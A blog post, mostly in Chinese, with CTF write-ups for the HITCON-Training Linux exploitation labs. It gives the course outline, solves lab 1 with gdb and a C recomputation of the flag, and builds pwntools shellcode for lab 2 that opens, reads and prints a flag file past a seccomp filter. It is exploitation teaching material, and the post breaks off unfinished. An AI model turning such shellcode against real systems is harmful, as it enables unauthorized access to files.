wtf

WTF is white tight feet.

HITCON-train

wtfff's Avatar 2022-06-08

分享本文
  1. 1. HITCON-Training
    1. 1.1. Environment Setup
    2. 1.2. Outline
    3. 1.3. write up
    4. 1.4. LAB 1 [sysmagic]
    5. 1.5. LAB 2 [orw.bin]
      1. 1.5.1. syscall : shellcode

HITCON-Training

For Linux binary Exploitation

Environment Setup

git clone https://github.com/scwuaptx/HITCON-Training.git ~/
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh

Outline

  • Basic Knowledge

    • Introduction
      • Reverse Engineering
        • Static Analysis
        • Dynamic Analysis
      • Exploitation
      • Useful Tool
        • IDA PRO
        • GDB
        • Pwntool
      • lab 1 - sysmagic
    • Section
    • Compile,linking,assmbler
    • Execution
      • how program get run
      • Segment
    • x86 assembly
      • Calling convention
      • lab 2 - open/read/write
      • shellcoding

  • Stack Overflow

    • Buffer Overflow
    • Return to Text/Shellcode
      • lab 3 - ret2shellcode
    • Protection
      • ASLR/DEP/PIE/StackGuard
    • Lazy binding
    • Return to Library
      • lab 4 - ret2lib

  • Return Oriented Programming

    • ROP
      • lab 5 - simple rop
    • Using ROP bypass ASLR
      • ret2plt
    • Stack migration
      • lab 6 - migration

  • Format String Attack

    • Format String
    • Read from arbitrary memory
      • lab 7 - crack
    • Write to arbitrary memory
      • lab 8 - craxme
    • Advanced Trick
      • EBP chain
      • lab 9 - playfmt

  • x64 Binary Exploitation

    • x64 assembly
    • ROP
    • Format string Attack

  • Heap exploitation

    • Glibc memory allocator overview
    • Vulnerablility on heap
      • Use after free
        • lab 10 - hacknote
      • Heap overflow
        • house of force
          • lab 11 - 1 - bamboobox1
        • unlink
          • lab 11 - 2 - bamboobox2

  • Advanced heap exploitation

    • Fastbin attack
      • lab 12 - babysecretgarden
    • Shrink the chunk
    • Extend the chunk
      • lab 13 - heapcreator
    • Unsortbin attack
      • lab 14 - magicheap

  • C++ Exploitation

    • Name Mangling
    • Vtable fucntion table
    • Vector & String
    • New & delete
    • Copy constructor & assignment operator
      • lab 15 - zoo

  • 那些 Pwning 的奇淫技巧:

write up

LAB 1 [sysmagic]

简单的 Symbolic Execution

反编译发现输入buf == v2,buf是随机数,可以直接gdb调试。

1
2
3
4
5
6
if ( buf == v2 )
//  0x8048720 <get_flag+389>    cmp    edx, eax
  {
    for ( i = 0; i <= 0x30; ++i )
      putchar(v5[i] ^ v6[i + 1]);
  }

断点 0x08048712 <+375>: call 0x8048480 <__isoc99_scanf@plt>,然后随便输入一个值,

1
2
3
4
5
6
7
8
9
pwndbg> b *get_flag+375
Breakpoint 1 at 0x8048712
pwndbg> set $eax=$edx
pwndbg> b *get_flag+471
Note: breakpoint 2 also set at pc 0x8048772.
Breakpoint 3 at 0x8048772
pwndbg> c
Continuing.
CTF{debugger_1s_so_p0werful_1n_dyn4m1c_4n4lySis!}

其实我在想另一种方法,就是既然变量都在程序里,我们也可以手动计算。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#include<stdio.h>
main() {
    char v5[0x80];
    char buf[0x80] = "BDo_you_know_why_my_teammate_Orange_is_so_angry???";
    int i;
    v5[0] = 7;
    v5[1] = 59;
    v5[2] = 25;
    v5[3] = 2;
    v5[4] = 11;
    v5[5] = 16;
    v5[6] = 61;
    v5[7] = 30;
    v5[8] = 9;
    v5[9] = 8;
    v5[10] = 18;
    v5[11] = 45;
    v5[12] = 40;
    v5[13] = 89;
    v5[14] = 10;
    v5[15] = 0;
    v5[16] = 30;
    v5[17] = 22;
    v5[18] = 0;
    v5[19] = 4;
    v5[20] = 85;
    v5[21] = 22;
    v5[22] = 8;
    v5[23] = 31;
    v5[24] = 7;
    v5[25] = 1;
    v5[26] = 9;
    v5[27] = 0;
    v5[28] = 126;
    v5[29] = 28;
    v5[30] = 62;
    v5[31] = 10;
    v5[32] = 30;
    v5[33] = 11;
    v5[34] = 107;
    v5[35] = 4;
    v5[36] = 66;
    v5[37] = 60;
    v5[38] = 44;
    v5[39] = 91;
    v5[40] = 49;
    v5[41] = 85;
    v5[42] = 2;
    v5[43] = 30;
    v5[44] = 33;
    v5[45] = 16;
    v5[46] = 76;
    v5[47] = 30;
    v5[48] = 0x42;
    for ( i = 0; i <= 0x30; ++i )
        putchar(v5[i] ^ buf[i + 1]);
}
1
2
sb@xulun:~/pwn/HITCON-Training/LAB/lab1$ ./calc 
CTF{debugger_1s_so_p0werful_1n_dyn4m1c_4n4lySis!}

LAB 2 [orw.bin]

syscall : shellcode

跟pwnable.tw的orw应该是同一题,翻了翻互联网的wp,记录一下。

1
Only open read write syscall are allowed to use.

main

1
2
3
4
5
6
7
8
int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}

orw_seccomp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
unsigned int orw_seccomp()
{
  __int16 v1; // [esp+4h] [ebp-84h] BYREF
  char *v2; // [esp+8h] [ebp-80h]
  char v3[96]; // [esp+Ch] [ebp-7Ch] BYREF
  unsigned int v4; // [esp+6Ch] [ebp-1Ch]

  v4 = __readgsdword(0x14u);
  qmemcpy(v3, &unk_8048640, sizeof(v3));
  v1 = 12;
  v2 = v3;
  prctl(38, 1, 0, 0, 0);
  prctl(22, 2, &v1);
  return __readgsdword(0x14u) ^ v4;
}

关注prctl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#define PR_SET_SECCOMP	22
/*
 * If no_new_privs is set, then operations that grant new privileges (i.e.
 * execve) will either fail or not grant them.  This affects suid/sgid,
 * file capabilities, and LSMs.
 *
 * Operations that merely manipulate or drop existing privileges (setresuid,
 * capset, etc.) will still work.  Drop those privileges if you want them gone.
 *
 * Changing LSM security domain is considered a new privilege.  So, for example,
 * asking selinux for a specific new context (e.g. with runcon) will result
 * in execve returning -EPERM.
 */
#define PR_SET_NO_NEW_PRIVS	38
prctl(PR_SET_NO_NEW_PRIVS, 1);// use the SECCOMP_SET_MODE_FILTER operation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sb@xulun:~/pwn/HITCON-Training/LAB/lab2$ seccomp-tools dump ./orw
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0x40000003  if (A != ARCH_I386) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x07 0x00 0x000000ad  if (A == rt_sigreturn) goto 0011
 0004: 0x15 0x06 0x00 0x00000077  if (A == sigreturn) goto 0011
 0005: 0x15 0x05 0x00 0x000000fc  if (A == exit_group) goto 0011
 0006: 0x15 0x04 0x00 0x00000001  if (A == exit) goto 0011
 0007: 0x15 0x03 0x00 0x00000005  if (A == open) goto 0011
 0008: 0x15 0x02 0x00 0x00000003  if (A == read) goto 0011
 0009: 0x15 0x01 0x00 0x00000004  if (A == write) goto 0011
 0010: 0x06 0x00 0x00 0x00050026  return ERRNO(38)
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW

系统过滤,系统调用函数中只有open,read,write能够进入下一步。

参考一个师傅的做法,首先使用open打开flag,然后用read读取flag,最后通过stdout输出到屏幕。

1
2
3
int fd = sys_open("/home/orw/flag");
sys_read(fd, flag, 0x30);
sys_write(1, flag, 0x30); 
1
2
3
.bss:0804A060                 public shellcode
.bss:0804A060 shellcode       db    ? ;               ; CODE XREF: main+42↑p
.bss:0804A060                                         ; DATA XREF: main+2E↑o ...
1
2
3
4
5
6
该师傅的
栈布局:
shellcode at (.bss) 0x0804A060
code at shellcode+0x0, data at shellcode+0x80(0x0804A0E0)
	data+0x0   : /home/orw/flag
	data+0x20  : [flag]

我的观察:

1
2
3
4
read正下方的一些指令
add    esp,0x10
mov    eax,0x804a060 # shellcode
call   eax

eax作为返回值,当我们传入open(path)返回的文件描述符(见pwnable.kr的fd),一个FILE流的句柄,可以有该句柄读入到另一个寄存器(edi还是esp都可以,我们只是需要一个地址去存放)。

1
2
3
4
5
6
7
shellcode =  ''
# flag file open
shellcode += shellcraft.open('/home/orw/flag')
# read -> input
shellcode += shellcraft.read('eax', 'edi', 100)
# write -> output
shellcode += shellcraft.write(1, 'edi', 100)

对于汇编的知识,

本文作者 : wtfff
本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议(CC BY-NC-SA 4.0)进行许可。This blog is under a CC BY-NC-SA 4.0 Unported License
本文链接 : http://im0use.github.io/2022/06/08/hitcon-train/

本文最后更新于 天前,文中所描述的信息可能已发生改变

本文发表于  , 最后修改于